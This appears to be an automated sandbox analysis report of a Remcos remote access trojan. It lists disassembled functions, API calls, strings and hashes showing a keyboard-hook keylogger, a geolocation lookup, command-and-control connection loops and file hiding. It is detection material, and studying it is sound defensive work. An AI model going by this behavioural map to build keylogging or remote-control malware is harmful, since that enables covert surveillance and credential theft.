                    control_flow_graph 1288 40a2b8-40a2cf 1289 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1288->1289 1290 40a333-40a343 GetMessageA 1288->1290 1289->1290 1293 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1289->1293 1291 40a345-40a35d TranslateMessage DispatchMessageA 1290->1291 1292 40a35f 1290->1292 1291->1290 1291->1292 1294 40a361-40a366 1292->1294 1293->1294
                    APIs
                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                    • GetLastError.KERNEL32 ref: 0040A2ED
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • GetMessageA.USER32 ref: 0040A33B
                    • TranslateMessage.USER32(?), ref: 0040A34A
                    • DispatchMessageA.USER32 ref: 0040A355
                    Strings
                    • Keylogger initialization failure: error , xrefs: 0040A301
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                    • String ID: Keylogger initialization failure: error
                    • API String ID: 3219506041-952744263
                    • Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                    • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                    • Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                    • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                    Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1370 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1375 41b3c5-41b3e6 InternetReadFile 1370->1375 1376 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1375->1376 1377 41b40c-41b40f 1375->1377 1376->1377 1379 41b411-41b413 1377->1379 1380 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1377->1380 1379->1375 1379->1380 1384 41b427-41b431 1380->1384
                    APIs
                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                    Strings
                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileRead
                    • String ID: http://geoplugin.net/json.gp
                    • API String ID: 3121278467-91888290
                    • Opcode ID: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                    • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                    • Opcode Fuzzy Hash: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                    • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                    Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                      • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                      • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                    • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                    • ExitProcess.KERNEL32 ref: 0040F8CA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseExitOpenProcessQuerySleepValue
                    • String ID: 4.9.4 Pro$override$pth_unenc
                    • API String ID: 2281282204-930821335
                    • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                    • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                    Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00509650), ref: 00433849
                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Context$AcquireRandomRelease
                    • String ID:
                    • API String ID: 1815803762-0
                    • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                    • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                    • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                    • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                    Function 00448957 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                    Strings
                    • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FileSystem
                    • String ID: GetSystemTimePreciseAsFileTime
                    • API String ID: 2086374402-595813830
                    • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                    • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                    • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                    • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                    Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                    • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                    • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                    • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                    Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                    • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                    • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                    • Instruction Fuzzy Hash:
                    Function 0040E9C5 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 98 40ebec-40ec02 call 401fab call 4139a9 80->98 93 40ec1c 88->93 94 40ec1e-40ec2a call 41b2c3 88->94 92 40eef1 89->92 92->49 93->94 104 40ec33-40ec37 94->104 105 40ec2c-40ec2e 94->105 98->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 118 40ec3e-40ec40 109->118 121 40ec42-40ec47 call 407738 call 407260 118->121 122 40ec4c-40ec5f call 401e65 call 401fab 118->122 121->122 122->108 141 40ec61-40ec67 122->141 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 203 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->203 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->234 182 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->182 183 40ee0f-40ee19 call 409057 180->183 193 40ee1e-40ee42 call 40247c call 434798 182->193 183->193 210 40ee51 193->210 211 40ee44-40ee4f call 436e90 193->211 203->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 210->217 211->217 271 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->271 286 40efc1 234->286 287 40efdc-40efde 234->287 271->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 271->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->92 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 356 40f159-40f16c call 401e65 call 401fab 347->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->357 367 40f1cc-40f1df call 401e65 call 401fab 356->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 416 40f287-40f28c 412->416 417 40f2cc-40f2df call 401fab call 4134ff 412->417 415 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->415 415->417 416->415 426 40f2e4-40f2e7 417->426 426->157 428 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 426->428 443 40f346-40f34b DeleteFileW 428->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                    APIs
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                      • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                    • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                    • API String ID: 2830904901-3701325316
                    • Opcode ID: 898fc42a08711b1fc07b96e79a6387ecb524032f91657ecf64c21f014e13491f
                    • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                    • Opcode Fuzzy Hash: 898fc42a08711b1fc07b96e79a6387ecb524032f91657ecf64c21f014e13491f
                    • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                    Function 00414F2A Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 566 415210-415225 call 404f51 call 4048c8 560->566 567 4151e5-41520b call 402093 * 2 call 41b4ef 560->567 581 415aa3-415ab5 call 404e26 call 4021fa 561->581 566->581 582 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 566->582 567->581 597 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 581->597 598 415add-415ae5 call 401e8d 581->598 648 415380-41538d call 405aa6 582->648 649 415392-4153b9 call 401fab call 4135a6 582->649 597->598 598->477 648->649 655 4153c0-41577f call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->655 656 4153bb-4153bd 649->656 782 415781 call 404aa1 655->782 656->655 783 415786-415a0a call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a0f-415a16 783->901 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->581
                    APIs
                    • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                    • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                    • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$ErrorLastLocalTime
                    • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                    • API String ID: 524882891-108984374
                    • Opcode ID: 81c5a98812ea8a0caa0e97c4631378a6ab0cc3ec579a2ca142f0814394a5abfa
                    • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                    • Opcode Fuzzy Hash: 81c5a98812ea8a0caa0e97c4631378a6ab0cc3ec579a2ca142f0814394a5abfa
                    • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                    Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 925 414d86-414dc2 926 414dc8-414ddd GetSystemDirectoryA 925->926 927 414edd-414ee8 925->927 928 414ed3 926->928 929 414de3-414e2f call 441a3e call 441a98 LoadLibraryA 926->929 928->927 934 414e31-414e3b GetProcAddress 929->934 935 414e46-414e80 call 441a3e call 441a98 LoadLibraryA 929->935 936 414e42-414e44 934->936 937 414e3d-414e40 FreeLibrary 934->937 948 414e82-414e8c GetProcAddress 935->948 949 414ecf-414ed2 935->949 936->935 939 414e97 936->939 937->936 942 414e99-414eaa GetProcAddress 939->942 943 414eb4-414eb7 FreeLibrary 942->943 944 414eac-414eb0 942->944 947 414eb9-414ebb 943->947 944->942 946 414eb2 944->946 946->947 947->949 950 414ebd-414ecd 947->950 951 414e93-414e95 948->951 952 414e8e-414e91 FreeLibrary 948->952 949->928 950->949 950->950 951->939 951->949 952->951
                    APIs
                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                    • LoadLibraryA.KERNEL32(?), ref: 00414E17
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                    • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                    • LoadLibraryA.KERNEL32(?), ref: 00414E76
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                    • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                    • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                    • API String ID: 2490988753-744132762
                    • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                    • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                    • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                    • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                    Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • Sleep.KERNEL32(00001388), ref: 0040A740
                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                      • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                    • API String ID: 3795512280-1152054767
                    • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                    • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                    • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                    • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                    Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
